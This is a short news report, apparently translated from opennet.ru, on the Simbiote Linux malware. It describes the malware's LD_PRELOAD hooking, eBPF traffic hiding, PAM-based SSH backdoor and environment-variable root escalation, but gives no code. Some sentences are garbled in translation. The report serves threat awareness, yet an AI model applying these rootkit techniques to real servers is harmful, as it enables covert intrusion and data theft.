Researchers at Intezer and BlackBerry have discovered malware codenamed Simbiote, which is used to inject backdoors and rootkits onto compromised Linux servers. Malicious software was found on the systems of financial institutions in a number of countries in Latin America. To install Simbiote on a system, an attacker must have root access, which can be obtained, for example, as a result of exploiting unpatched vulnerabilities or leaking accounts. Simbiote allows you to secure your presence in the system after hacking to carry out further attacks, hide the activity of other malicious applications and organize the interception of confidential data.
A feature of Simbiote is distribution in the form of a shared library, which is loaded during the startup of all processes using the LD_PRELOAD mechanism and replaces some calls to the standard library. Spoofed call handlers hide backdoor related activity, such as excluding certain items in the process list, blocking access to certain files in /proc, hiding files in directories, excluding a malicious shared library from ldd output (the execve function is intercepted and calls are parsed with an environment variable LD_TRACE_LOADED_OBJECTS) do not show network sockets associated with malicious activity.
To protect against traffic inspection, the functions of the libpcap library are redefined, /proc/net/tcp is read filtered, and an eBPF program is loaded into the kernel, which prevents traffic analyzers from working and discards third-party requests to their own network handlers. The eBPF program is launched among the first handlers and runs at the lowest level of the network stack, which makes it possible to hide the network activity of the backdoor, including from analyzers launched later.
Simbiote also allows you to bypass some activity analyzers in the file system, since the theft of confidential data can be carried out not at the level of opening files, but by intercepting read operations from these files in legitimate applications (for example, substitution of library functions allows you to intercept user input of a password or files loaded from a file). access key data). To organize remote login, Simbiote intercepts some PAM calls (Pluggable Authentication Module), which allows you to connect to the system via SSH with certain attacking credentials. There is also a hidden option to elevate your privileges to root by setting the HTTP_SETTHIS environment variable.
Source: opennet.ru